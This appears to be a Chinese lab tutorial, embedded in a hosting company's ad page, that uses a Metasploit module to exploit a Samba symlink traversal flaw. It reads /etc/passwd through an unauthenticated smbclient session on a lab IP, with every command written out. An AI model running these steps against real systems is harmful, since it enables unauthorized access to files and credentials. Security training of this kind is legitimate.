Metasploit溢出samba提权漏洞-创新互联

Samba是一套实现SMB(server messages block)协议,跨平台进行文件共享和打印共享服务的程序,samba的sambd默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过smbclient端使用一个对称命,创建一个包含..的目录遍历符的软连接 ,可以进行目录遍历以及访问任意文件。

成都创新互联-专业网站定制、快速模板网站建设、高性价比肃北网站开发、企业建站全套包干低至880元,成熟完善的模板库,直接使用。一站式肃北网站制作公司更省心,省钱,快速模板网站建设找我们,业务覆盖肃北地区。费用合理售后完善,十多年实体公司更值得信赖。

一、利用nmap工具扫描目标主机

1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。

Metasploit溢出samba提权漏洞

1.3在终端中输入命令“msfconsole”,启动MSF终端。

1.4在终端中输入命令“search samba”,搜索samba的相关工具和***载荷。

1.5在终端中输入命令“use auxiliary/admin/smb/samba_symlink_traversal”,启用漏洞利用模块, 提示符就会提示进入到该路径下。

Metasploit溢出samba提权漏洞

1.6在终端中输入命令“info”,查看需要设置的相关项,“yes”表示必须填写的参数。

Metasploit溢出samba提权漏洞

1.7在终端中输入命令“set RHOST 192.168.1.3”,设置目标主机的IP地址。

1.8在终端中输入“set SMBSHARE tmp”, 设置SAM可写文件。

1.9在终端中输入“exploit”, 开始***。

1.10新打开一个终端,输入“smbclient //192.168.1.3/tmp”,直接回车,不用输入密码。

Metasploit溢出samba提权漏洞

1.11在终端中输入“cd rootfs”, 进入rootfs目录,在终端下输入命令“ls”,列出目录。

1.12在终端中输入“more /etc/passwd”, 查看目标主机系统中的密码。

Metasploit溢出samba提权漏洞

Metasploit溢出samba提权漏洞

另外有需要云服务器可以了解下创新互联scvps.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。


当前标题:Metasploit溢出samba提权漏洞-创新互联
链接分享:http://azwzsj.com/article/pcipi.html